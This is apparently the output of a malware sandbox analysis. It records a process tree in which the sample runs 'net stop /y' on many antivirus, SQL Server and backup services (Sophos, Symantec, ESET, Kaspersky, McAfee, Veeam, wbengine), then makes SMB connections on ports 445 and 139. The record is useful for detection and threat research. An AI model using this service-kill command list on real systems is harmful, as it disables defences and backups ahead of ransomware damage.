C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SAVService /y

C:\Windows\SysWOW64\net.exe

net stop SAVService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SAVService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SDRSVC /y

C:\Windows\SysWOW64\net.exe

net stop SDRSVC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SDRSVC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SepMasterService /y

C:\Windows\SysWOW64\net.exe

net stop SepMasterService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SepMasterService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ShMonitor /y

C:\Windows\SysWOW64\net.exe

net stop ShMonitor /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ShMonitor /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop Smcinst /y

C:\Windows\SysWOW64\net.exe

net stop Smcinst /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Smcinst /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SmcService /y

C:\Windows\SysWOW64\net.exe

net stop SmcService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SmcService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SMTPSvc /y

C:\Windows\SysWOW64\net.exe

net stop SMTPSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SMTPSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$TPS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLBrowser /y

C:\Windows\SysWOW64\net.exe

net stop SQLBrowser /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLBrowser /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLSafeOLRService /y

C:\Windows\SysWOW64\net.exe

net stop SQLSafeOLRService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLSafeOLRService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\net.exe

net stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLTELEMETRY /y

C:\Windows\SysWOW64\net.exe

net stop SQLTELEMETRY /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLTELEMETRY /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLWriter /y

C:\Windows\SysWOW64\net.exe

net stop SQLWriter /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLWriter /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamBackupSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamBackupSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamBackupSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamCloudSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamCloudSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamCloudSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamDeploymentService /y

C:\Windows\SysWOW64\net.exe

net stop VeeamDeploymentService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamDeploySvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamDeploySvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamDeploySvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamMountSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamMountSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamMountSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamNFSSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamNFSSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamRESTSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamRESTSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamRESTSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamTransportSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamTransportSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop W3Svc /y

C:\Windows\SysWOW64\net.exe

net stop W3Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop W3Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wbengine /y

C:\Windows\SysWOW64\net.exe

net stop wbengine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wbengine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop WRSVC /y

C:\Windows\SysWOW64\net.exe

net stop WRSVC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop WRSVC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop swi_update /y

C:\Windows\SysWOW64\net.exe

net stop swi_update /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop swi_update /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQL Backups" /y

C:\Windows\SysWOW64\net.exe

net stop "SQL Backups" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQL Backups" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PROD /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PROD /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop msftesql$PROD /y

C:\Windows\SysWOW64\net.exe

net stop msftesql$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop msftesql$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop NetMsmqActivator /y

C:\Windows\SysWOW64\net.exe

net stop NetMsmqActivator /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop NetMsmqActivator /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EhttpSrv /y

C:\Windows\SysWOW64\net.exe

net stop EhttpSrv /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EhttpSrv /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ekrn /y

C:\Windows\SysWOW64\net.exe

net stop ekrn /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ekrn /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ESHASRV /y

C:\Windows\SysWOW64\net.exe

net stop ESHASRV /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ESHASRV /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AVP /y

C:\Windows\SysWOW64\net.exe

net stop AVP /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AVP /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop klnagent /y

C:\Windows\SysWOW64\net.exe

net stop klnagent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop klnagent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wbengine /y

C:\Windows\SysWOW64\net.exe

net stop wbengine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wbengine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfefire /y

C:\Windows\SysWOW64\net.exe

net stop mfefire /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfefire /y

Network

Country Destination Domain Proto
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp

Files
